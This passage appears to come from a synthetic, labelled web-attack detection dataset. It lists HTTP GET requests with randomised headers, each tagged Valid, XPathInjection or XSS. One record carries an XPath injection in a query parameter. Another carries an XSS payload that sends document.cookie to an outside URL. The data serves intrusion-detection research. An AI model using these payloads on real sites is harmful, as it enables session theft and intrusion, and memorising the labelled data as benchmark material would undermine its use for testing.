Accept-Encoding: gzip;q=0.1, deflate, gzip, compress;q=0.3, compress
Accept-Language: eno7lru-rmE, aeuAmpm-e9hsea, ffimoer-wdisadd;q=0.9
Cache-Control: no-transform
Client-ip: 250.248.98.251
Cookie: ni0=Bfcyu group by0s<YoMD;eelfef=11933
Cookie2: $Version="3"
Date: Wed, 02 Dec 09 14:19:44 GMT
ETag: W/"OFX8qW6@tVkBPnDzL"
Expect: 100-continue
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Sun, 13 Dec 09 16:34:42 UTC
If-Unmodified-Since: Fri, 06 Jan 06 15:02:33 GMT
If-Match: "OihgoSJEGwNDQGEZVdZB"
If-None-Match: "usIDgmAjVqZCh.RyN"
If-Range: Sun, 20 Jun 04 14:13:44 CET
Max-Forwards: 548
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic cnhlaXN1czplb3hldGk=
Authorization: NTLM bk5pTnVhZ2FldG9lc2VoeHNnY01hQ2h0bDB6dHVkcmhlc3dOaWg=
Range: 784942-,615-
Referer: http://xafoaz.ch/p1Lu9re/egna/hdainu.cgi
TE: gzip,gzip
Trailer: Host
User-Agent: Mozilla/8.3 (X11; U; Linux i386 4.4; pI-xs; rv:9.6.3) Gecko/28729759
UA-CPU: 68000
UA-Disp: 9144,843,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5013x5767
Via: 7.6 92.153.139.209
Transfer-Encoding: compress
Upgrade: AwRag/8.7, eiPt/1.4
Warning: 330 107.110.243.183 "eugbdottuttihe6M9i" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 45329823
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14096
Start - Id: 35583
class: XPathInjection
GET /ajLC8PTbcmgFpHPas/sEonytttt04limaf/dmpasycusuulo/orCZN_XPXd@eSNhB/tkN8aC4Henbr/d8Uy.zio9RzU/atB09_/i-bqBUY4/werdxwY/rska7HCG/eb6.mspx?nefat=eBrgMZU7Oq&PDz1-bs1W=4&o3on1iseeapdr=270&eLhohtecehl=v9qEik3nnY&y9do=24++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++4245%3D&stdinHqi=n4da HTTP/1.0
Host: www.ihaa.de:80
Connection: oxdiyms
Accept: audio/basic, audio/basic;q=0.7, text/html
Accept-Charset: iso-8859-9, x-mac-japanese, iso-8859-8, euc-tw, euc-cn
Accept-Encoding: *;q=0.0
Accept-Language: gnt-trmse6y;q=0.2, 12aj-eduov;q=0.2, dbb-wraesukt, uu2IsiIi-oaerfp
Cache-Control: no-transform
Client-ip: 146.199.243.126
Cookie: ayn4rRybOrI=u9e;wcO0PC.o=7
Cookie2: $Version="51"
Date: Mon, 11 Sep 06 11:15:42 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Thu, 04 Oct 07 13:16:26 GMT
If-Unmodified-Since: Thu, 02 Feb 06 05:06:50 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 64
MIME-Version: 4.7
Pragma: no-cache
Authorization: Digest nonce
Range: 1278-6
Referer: http://www.rtot.de/rfoMetsd/iao6/dndc7i6r/Hmermm/hIhtd.wmn
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: irlktmo (qVn_w7r; uHS5uG51FM; ui057kb)
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 468x391
Via: HTTP/2.1 www.ndeot.png, 6.2 www.momfs2ti.shtml, FTP/4.7 218.225.175.124
Transfer-Encoding: Evle
Upgrade: qqbAbn/3.5, de6/4.4, i7xow/6.7
Warning: 764 www.estd.html "reyeebllnhmEobh" 
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35583
Start - Id: 31368
class: Valid
GET /ixtq3Uas8dBPNg/nyiTuyTats8vgntdx/da840nms.cgi?desrth8llerqso6=c%5Dc&is=jort7o%3Cey&rneoroetSba=1atloidoe9lia&rwtnf=e%29ee4s0%27dconnect&sNDe=tod&nnobeeaotg6=mWSb9TPmGlv HTTP/1.1
Host: 84.58.22.35:80
Connection: close
Accept: audio/*
Accept-Charset: cp-936;q=0.5, x-mac-greek;q=0.1
Accept-Encoding: identity, gzip
Accept-Language: hrnwsaao-sebsfz, 7nrtN-ynn8c;q=0.0, st-caova9t6;q=0.9
Cache-Control: no-transform
Client-ip: 164.204.220.43
Cookie: ttewestpo2t=5ahrn;iei=h;sshyraawjqxtxwj=a;iiuHl6huud=98
Cookie2: $Version="334"
Date: Sat, 05 Apr 08 16:09:16 GMT
ETag: "bLtJSDjv0-u90ifZ"
Expect: 100-continue
From: ertro@3cIlsoRsD5.cz
If-Modified-Since: Fri, 12 Jun 09 11:54:47 CET
If-Unmodified-Since: Sun, 10 Jul 05 12:53:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jul 09 12:31:12 UTC
Max-Forwards: 27
MIME-Version: 8.7
Pragma: h='eaewnh'
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: Basic cGVzYmFuMGU6aHJHYnFSb3Q=
Range: -34878,6878-7,3101-
Referer: /ietI.png
TE: trailers,deflate,deflate;q=0.7
Trailer: Referer
User-Agent: hhar (g.1s.VE; 0RQv-MMqKh)
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7934x883
Via: 9.3 218.173.55.127, 2.0 www.vhlweo.jpg, sola/6.9 255.250.185.247:73
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: aaeza/3.0
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 12566826495921
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31368
Start - Id: 10501
class: Valid
GET /qodeutet69ra0.html?w5p=Re%3F+ridbohtelnetlyiooilhe HTTP/1.0
Host: 49.72.18.144
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 205.159.115.158
Cookie: e5eqoecsJn=cut83etceenNe;smo=d;ott5arishse=sn%ug;UlvhttpslXh.T=hrl$)6>o6
Cookie2: $Version="721"
Date: Mon, 23 Aug 04 13:31:33 GMT
ETag: W/"wMyqQu4QHcU1ks_n"
Expect: Amt4
From: Po3inu1@xey4eI7tu.fr
If-Modified-Since: Tue, 22 Dec 09 03:40:59 GMT
If-Unmodified-Since: Sun, 22 Jun 08 17:38:33 GMT
If-Match: *
If-None-Match: ".W8t-0mLugb5RSBCk"
If-Range: *
Max-Forwards: 74
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: Basic UnRvdjpnbjZIdHBkdQ==
Range: 926-863
Referer: http://www.sPxyeR.org/ps3ees/Arte0/1axnhaxl/laiI/rmnfbjr.conf
TE: trailers,trailers,deflate
Trailer: Warning
User-Agent: 5qsRs8l/0.2
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: HTTP/8.6 www.i00ere.jpg
Transfer-Encoding: aqfo
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 364 17.253.249.140 "d4vHRriaUr2lxnus5tt" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 98147817279
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10501
Start - Id: 47244
class: XSS
GET /hilcgunefA99t7TTl/ENziseo/qm9vB73kHbAlBpu/sock_streamSr.aspx?pern4lOrhdb7r=tmeetaligluqs5lrn&thb5Derd6=LiOoeot&svedj=7var&vr6yeyVoSsnaed=oIOVM%40a9&domrcsdnn=406917&woout9ln4in5s=%3Cbody+onload++%3D++%22++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.nsla.com%2Fcgi-bin%2Fises.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E HTTP/1.1
Host: www.7latLztogy.st:80
Connection: keep-alive
Accept: video/quicktime;q=0.7, text/html
Accept-Charset: windows-1257;q=0.4, x-mac-chinesesimp, x-mac-chinesesimp;q=0.5, cp-950;q=0.6, windows-1255
Accept-Encoding: deflate;q=0.4, compress, identity, compress, compress
Accept-Language: ru-1m7wbobP, ihh-hruat;q=0.6, TrA-rzro1;q=0.3
Cache-Control: no-transform
Client-ip: 190.120.113.241
Cookie: Heiooc=iscC8;td4rlosmhrrznq=otUq@sAUI;caom=30;5wp-.Cd=01;Uptenojr=uAqLKC0cujn
Cookie2: $Version="66"
Date: Sat, 12 Sep 09 21:43:52 GMT
ETag: "WAB5@Z.yDarnU0JFvhk"
Expect: ltaUwimt=sm2Reitr
From: eeTaCo@mVlE3nKhn.biz
If-Modified-Since: Sun, 07 Mar 10 12:03:31 UTC
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: "k@2qDpaBPx4@wdb7ATHn"
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 8
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -3
Referer: /b3nP/eTdsk/gfUem.tar
TE: trailers,trailers,gzip
Trailer: Max-Forwards
User-Agent: seca0ailadhE3pr7Taf
UA-CPU: Sparc
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/4.8 www.1rmIlfe.js, HTTP/0.9 www.q03r.js:8, 2aae/0.4 www.wao7.tiff
Transfer-Encoding: encds
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 47.247.175.175
X-Serial-Number: 15152704800
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47244
Start - Id: 32519
class: Valid
GET /OgP0noor.js? HTTP/1.0
Host: www.h7tsaE.cz
Connection: close
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: deflate;q=0.2
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 97.114.234.93
Cookie: x2butxV8Vt9am=W;arnorecjiinGni=wcfhau5ki\[sgpx;rt04eisvhso=30543;3erwgyllneayt=101194281;t0ttptash=wi2dnaaiisitns
Cookie2: $Version="46"
Date: Sat, 15 Sep 07 19:30:09 UTC
ETag: "lc5piz.ASIiOB4IilU4"
Expect: gditEiD=ponr;eoaBonao
From: arer@q1ecihst.ch
If-Modified-Since: Tue, 13 Jan 09 11:02:43 CET
If-Unmodified-Since: Tue, 10 May 05 08:58:22 GMT
If-Match: "ca5XEYTtnJVPso@Ad"
If-None-Match: "Ck2euIgw6oblJFFbZ2"
If-Range: *
Max-Forwards: 5949
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic OWRhYWd3b0Y6Nm1uaXNwdA==
Authorization: Digest username="gayacct"
Range: -75795
Referer: http://www.nqsadk.cz/O9dTpai/ihqs/hloe0e/ewaoay/nh3ii9t.jsp
TE: trailers,deflate;q=0.0,deflate
Trailer: User-Agent
User-Agent: Mozilla/8.0 (X11; U; Solaris 5.5; r2-hz; rv:5.5.0) Gecko/39448619
UA-CPU: PowerPC
UA-Disp: 411,220,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5706x229
Via: FTP/0.6 www.ntheor.html, 6.3 41.68.176.240, 6.9 www.owfdeabr.js
Transfer-Encoding: tqrtas
Upgrade: ajrIgd/6.3, orleV/5.0
Warning: 998 27.139.163.250 "etu4Yso" "Sun, 01 May 05 05:05:42 UTC"
X-Forwarded-For: 10.109.104.13
X-Serial-Number: 31593732
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32519
Start - Id: 17870
class: Valid
GET /pssystemXuFYaccess_lognscriptACE/rr6gN5f/amidNlOqEhNn5j7hteno/oQbQWl4Cy5w8F0bSFWkG/tiq5yatedhtunmafy3/dlWEM.sWQz3R4gZMv3/tfta/tEcFpn.cfm? HTTP/1.0
Host: www.sEhni.fr:32
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: us-ascii, iso-8859-7, x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 78.14.160.119
Cookie: D0=851504025;rnymBaltac1=ardhat ewtde;aD4SMq3K=3910;ycidnnAeEua7hln=cisrN5Yeu-P
Cookie2: $Version="2"
Date: Wed, 01 Apr 09 13:24:20 UTC
ETag: "cBFQxJxE.IwVMz5vCz1w"
Expect: anaiO
From: temygise@hhgs.com
If-Modified-Since: Mon, 22 Jan 07 09:29:20 GMT
If-Unmodified-Since: Sun, 30 Nov 08 06:10:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.8
Pragma: ovlgltgn=o2ril
Proxy-Authorization: NTLM aWd1bXRkZWR2eW5hc3ptdG5odHVaUmhoczJBbGR0ZGxF
Authorization: Basic OXlzMGRjOmFuYW9laWU=
Range: -321024,-932066,827-
Referer: /lEjyf/lnnyd4/ptte/ll3FwN/ecueRuyi.asp
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 1.2; Ue-nI; rv:6.9.8) Gecko/31749907
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8176x316
Via: tme/6.0 www.AAmysieh.shtml, HTTP/2.5 98.128.199.64, nrx/2.6 51.192.192.211
Transfer-Encoding: gzip
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 182 45.71.47.57 "htrzocTenleelhEw" "Wed, 18 Oct 06 09:52:04 GMT"
X-Forwarded-For: 233.30.107.188
X-Serial-Number: 3494344
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17870
Start - Id: 31429
class: Valid
GET /KXkoorp3tXqexec9E/FgYZA/Vaob9et/p5TGHOdV/elhrtoEu/wxp_NqJy./oFRaZ1tfdfAlyRVtW.Z/_script5IHPtEx4LsopenM.swf?fILwA=%2Fmn&ubysf=598403458&gcHsrimri=efIOhmiGpzwA&tcpb5tvlErn=Cae%7Elib&io=%27rRvd HTTP/1.1
Host: 6.78.252.88:80
Connection: tiky
Accept: application/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 84.151.240.11
Cookie: izeqrrI=8;NkVEC=3;loMoeg8=tqkD;vtszre=izzsu21ya
Cookie2: $Version="82"
Date: Tue, 10 Feb 04 15:37:31 UTC
ETag: W/"vwuPwnzIuRYiFKz6Mt@"
Expect: 100-continue
From: vconid@sswn.net
If-Modified-Since: Thu, 05 Jul 07 07:57:18 GMT
If-Unmodified-Since: Mon, 30 Jun 08 16:05:37 GMT
If-Match: "FFclgDtgwpekeYyJO"
If-None-Match: *
If-Range: Sun, 21 Jan 07 11:42:03 CET
Max-Forwards: 7
MIME-Version: 2.0
Pragma: ddvmr='cOiars7h'
Proxy-Authorization: NTLM aGRvZDZseWxucWFtZXZhdGFzOWV0a2FtdHlhZWVlYWw1RTc5MW50aXJpdHV1
Authorization: 2eid elr1d=tzhrx0jd
Range: -723,550-
Referer: http://www.twixiCes.org/o99Npc.pl
TE: gzip,trailers,gzip
Trailer: Via
User-Agent: Mozilla/1.3 (Windows; U; Win 9x 3.8; ne-hc; rv:9.9.4) Gecko/91566964
UA-CPU: PowerPC
UA-Disp: 887,1676,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4140x395
Via: 6.4 92.62.62.184
Transfer-Encoding: compress
Upgrade: wptde/7.7, 5sb/8.6
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31429
Start - Id: 15940
class: Valid
GET /As@/pee9edp/Lu.jpg?eacheNyiUiec=tmite&oidGe@9IZv=exhsteT%5D&tymetaZ1ylibdivDEAs=adr&dvfeetsakGbeooT=1726826&eoairotL=fo2ghn&kt1noor9Z=r-Z&nesn4=lm&oontsbt4e=oYsix&4TYp00a=uintyyEepftv&v9soeeha2enesn=whnem+g-&YkZHXgQ=sqnn+3zwttxadna&inputWFhz%ulocation.i@=0at&yT9CscriptMforml=na-nb&lanat=n0dtn&odislT=sbNLGTD7mUQ HTTP/1.1
Host: www.seinh4deCe.de
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1258;q=0.1, us-ascii, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 80.167.167.42
Cookie: 6hh=snoMPl;ssBR2g=5;41=dei;liswbwdkua4amh=ewhere4wnmochaiiErO;rebd9ltSn=wAe
Cookie2: $Version="0"
Date: Sat, 01 Apr 06 03:32:15 GMT
ETag: W/"vwzgaWCvT6Zo-YTA6inQ"
Expect: 100-continue
From: dejt@eiwqestde.org
If-Modified-Since: Tue, 04 Jul 06 19:59:48 GMT
If-Unmodified-Since: Mon, 28 Jan 08 09:13:56 CET
If-Match: *
If-None-Match: "NOGqUpheS5PWTTG24M"
If-Range: Sun, 11 Jan 04 15:35:11 GMT
Max-Forwards: 017
MIME-Version: 0.4
Pragma: StwSTs='emEfnshF'
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest opaque="Ns8fivs"
Range: -08,0744-,-43437
Referer: /n7aqutj.pdf
TE: chunked;q=0.0,chunked;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/6.6 (Windows; U; WinNT 2.0; ot-3r; rv:7.5.1) Gecko/67916215
UA-CPU: Sparc
UA-Disp: 9788,9519,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7490x6757
Via: 1.1 203.14.199.92:95068, HTTP/3.7 51.248.183.191
Transfer-Encoding: compress
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 249.146.24.22
X-Serial-Number: 902795825
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15940
Start - Id: 30865
class: Valid
GET /u@x/umwhyhS0m/K9oNeptgre9dl8smb.css? HTTP/1.0
Host: 246.217.208.248
Connection: close
Accept: audio/*, video/*, image/png;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 180.77.147.17
Cookie: tDIN=9;ld=nw:;Je581p= dh<];sjrI68yrte=21892897
Cookie2: $Version="3"
Date: Tue, 11 Jan 05 06:20:53 GMT
ETag: "B8iCeaK5_WMIWinPd"
Expect: 100-continue
From: uqfre@ho0adaw.st
If-Modified-Since: Thu, 31 Mar 05 01:18:50 GMT
If-Unmodified-Since: Sat, 07 Jun 08 20:11:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW1taGhndG8wSmVuZVdvem9lZUF6aGNkcmpudDlObm5hNWVybnNubnRu
Authorization: NTLM ZWlpMXR0N2RjaXJpOUhaSWVvY253dHFpb2Vyb3U5ZGdrbUg=
Range: -2
Referer: /tpon1oi/fqrjhO/e2v82/shn5Mf.mp3
TE: gzip;q=0.1
Trailer: Accept-Charset
User-Agent: Mozilla/1.2 (Windows; U; Win98 4.1; e0-ew; rv:2.5.7) Gecko/27544097
UA-CPU: StrongARM
UA-Disp: 072,6639,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1014x4541
Via: 7.3 52.37.194.171:8625, 0.4 www.mnxytBam.png, 4.7 132.179.177.122:7
Transfer-Encoding: gzip
Upgrade: qhwab/2.3, lTob/9.5, heg/1.2, Axen/2.5
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 5586644742
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30865
Start - Id: 295
class: Valid
GET /orcmddxgo12BGMnTu/EOabenrt/do1edaol1dton/etmSJJL_i@X/a-vJ8I/sdLl92nao9l/tnn/ixhUtMndGiawpk/ufqCxF.sh?6bP0WPn=8256265039 HTTP/1.1
Host: 114.178.49.86:80
Connection: keep-alive
Accept: image/*;q=0.1
Accept-Charset: x-mac-ce;q=0.7, windows-874, x-mac-korean;q=0.9, utf-7;q=0.0, iso-8859-7
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=23172
Client-ip: 40.252.184.69
Cookie: Kbg4=wKi7z.j
Cookie2: $Version="63"
Date: Sun, 12 Feb 06 11:46:38 UTC
ETag: "k_i2PsOOl.UP9puy.cK"
Expect: 9o0Znus0
From: atOG@okZhh.fr
If-Modified-Since: Sun, 01 Mar 09 23:18:55 GMT
If-Unmodified-Since: Mon, 08 Dec 08 12:04:10 CET
If-Match: "9bhfU4Oy57ISVaSJABJ"
If-None-Match: "SFI_EqA.hSIzGEamG"
If-Range: *
Max-Forwards: 8
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Basic RGhobGEwOjQxTXlhYnc=
Range: -1206,-9985
Referer: /caieT/eakmprp.avi
TE: gzip
Trailer: Expect
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 1.3; ed-tk; rv:0.0.4) Gecko/85283451
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: HTTP/8.3 230.220.61.246, HTTP/7.0 www.pa6tOu.htm, eao6/2.2 242.162.115.160
Transfer-Encoding: compress
Upgrade: aeeh/6.3, fgRaE/4.4
Warning: 115 www.hone.jpeg "q3i0Eo0DcebhmerEuNtI" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 295
Start - Id: 29691
class: Valid
GET /bJbJbCU-9d/alBOefdhWMc9BvR/rtt5llunrfojaOc6/acD_RUVS-l/YDOTI6D/2passwd8ZP5YKYlogs3K.js?gnkoeol=dtVpz.noXlV7&ass=dlZdWH3YDs&hbltgjsroti=tcrwa&5DC.C4xmJnD-=xNor&egsnd=%27o%25e&6pmaaslgAob=aid%5D8jaa&ltqtnuumj=iugteBmudeohnhku HTTP/1.1
Host: www.onenp.com:80
Connection: k4ebs
Accept: application/*;q=0.6, text/html;q=0.9, image/*
Accept-Charset: macintosh;q=0.1, euc-tw, x-mac-chinesesimp, x-mac-hebrew, windows-1252
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 210.96.241.160
Cookie: 0Dboot.ini4jVYpshutdown=O ;ntaA2xf=hAhYl;ut=cwsnrlikeocrwtgconnectltlh;2sednaI=634572;3etrrtdse=ja
Cookie2: $Version="020"
Date: Mon, 06 Dec 04 15:03:47 CET
ETag: W/"-4nO0--EDHRB0ZuRsVy"
Expect: 100-continue
From: icqca@mi5a7iM.cz
If-Modified-Since: Wed, 12 Jul 06 14:02:37 CET
If-Unmodified-Since: Wed, 01 Apr 09 18:18:41 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.1
Pragma: uvjurtrt=bayret
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: Digest realm
Range: -551432,8-
Referer: /meitp.pdf
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.2 (X11; U; Linux i386 2.5; bi-d3; rv:5.8.6) Gecko/69050192
UA-CPU: MIPS
UA-Disp: 0427,819,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 293x7382
Via: 5.2 116.216.29.154, bdtdhy/7.4 168.170.152.118
Transfer-Encoding: TSae
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 634 www.heiixDa.html:23 "eesheuoaeAepggkenat" "Thu, 13 Nov 08 12:05:34 CET"
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 149051815209
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29691
Start - Id: 17385
class: Valid
GET /tY-TuoII@L/eojeesceoEheWwqh/rciE0rMdo7uoros/iet5/ni3tbneo0kTToo/hajm4uUDow720.8.bkmt/aqGVU-psW3/aoo.tiff?bseieE4=e%7C4gi&DQP-v-lo=wO+8tslr&mjIo7eaa=c9tn&Iopscw45ooiweiz=930541953&maoo=hfPB&2sfoFl8n=0627&4SE3httpsLT=dnfrtqpp6v HTTP/1.0
Host: www.odeffLLeri.net
Connection: o0neey
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip
Accept-Language: ow-cb, ner-ba;q=0.2, El9-iceeca
Cache-Control: min-fresh=03
Client-ip: 94.109.158.18
Cookie: 7nm=asesre;wmiosrsiO=2644;zam9lek=nt;yTayen=7ur
Cookie2: $Version="80"
Date: Tue, 08 Jan 08 14:37:29 GMT
ETag: "gPzho-dhAQlFxoSl-O90"
Expect: 100-continue
From: eoioeyi@guvv.be
If-Modified-Since: Mon, 02 Jul 07 24:25:17 UTC
If-Unmodified-Since: Tue, 15 Dec 09 04:58:36 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Jul 08 20:50:43 CET
Max-Forwards: 5238
MIME-Version: 6.8
Pragma: enio2='bll'
Proxy-Authorization: Basic bG9zbmU6dHB1aVNvNA==
Authorization: NTLM d29laW1kZGEybkRnYWl0bmlpZWJvQm5OaHNublJxbnhldDVpOG1sb25vbw==
Range: 81-,2781-
Referer: http://www.e6td.de/ayui/2boe/c6adnuAh/bhGYtHtH.pl
TE: trailers,deflate;q=0.5,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: tcdizss6an (p80h1g1; eXJIDHd-; texMZmH)
UA-CPU: MIPS
UA-Disp: 436,9131,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 811x940
Via: FTP/4.3 www.3faN.css, FTP/3.9 www.toyC.tiff
Transfer-Encoding: gzip
Upgrade: oes/9.0, emu/6.8, ns1h6u/5.2, axenrt/5.8, sf0ta/2.7
Warning: 408 www.Tegislng.js "ctn2" 
X-Forwarded-For: 53.169.130.69
X-Serial-Number: 534036492924791
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17385
Start - Id: 25183
class: Valid
GET /3dYLbKkQ4/lXPH3S/rantguao2o/yNoNij/1PZXGnRT.pl?2isoU=t+rtS&csl=nLaroselecttr%28sperlbt&jwiG0HoA=nAdighihN%7Cisolep&jntu2seebr8oani=75040&drnad=n8%40telnet&n0eL6s=thttpeh&elmyay=nz14%26h0Tsbe&upeA39oil=15013&eodvnsmer0rne=27745&ciihcfferlilnPe=of0sO1.2&nnBhNfeee=26437&aftyeesY=m2ni&dpt4=1365489&nA=%3BbetweenntM%3DT HTTP/1.1
Host: 93.133.177.168
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.5, compress, identity, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 56.216.77.220
Cookie: ViT_n8=uD :rmycmd;33ocsh=981389867;U3l=33804106;tnlhUwssn4eiach=iseO1dnc5o9s9
Cookie2: $Version="53"
Date: Tue, 02 Nov 04 24:55:14 CET
ETag: W/"hAqlYd2Sq6tOVY8lO"
Expect: 100-continue
From: lGerd16@hdnad.be
If-Modified-Since: Mon, 14 Nov 05 10:24:19 GMT
If-Unmodified-Since: Tue, 16 Jan 07 24:10:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.4
Pragma: mecE='onhef'
Proxy-Authorization: otoaa trrO=Ianrd
Authorization: NTLM ZW9lcmFlZWRpZXJlcHJlaW96cERuZG9vdHR0aFV4bm90Z2h4bjFl
Range: 112178-7448,16-286958,552-
Referer: /totgirr.jsp
TE: deflate
Trailer: Via
User-Agent: ianreA/2.6
UA-CPU: 68000
UA-Disp: 550,936,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5457x802
Via: HTTP/2.2 www.cecd5.tiff, FTP/5.7 www.1aiaktwn.png, 6.7 www.riye.jpg:03079
Transfer-Encoding: compress
Upgrade: tIis/4.6
Warning: 306 www.opNgv8v.js:66319 "eFs8hETa4u2cl" "Tue, 16 Oct 07 02:47:43 CET"
X-Forwarded-For: 23.5.186.247
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25183
Start - Id: 13311
class: Valid
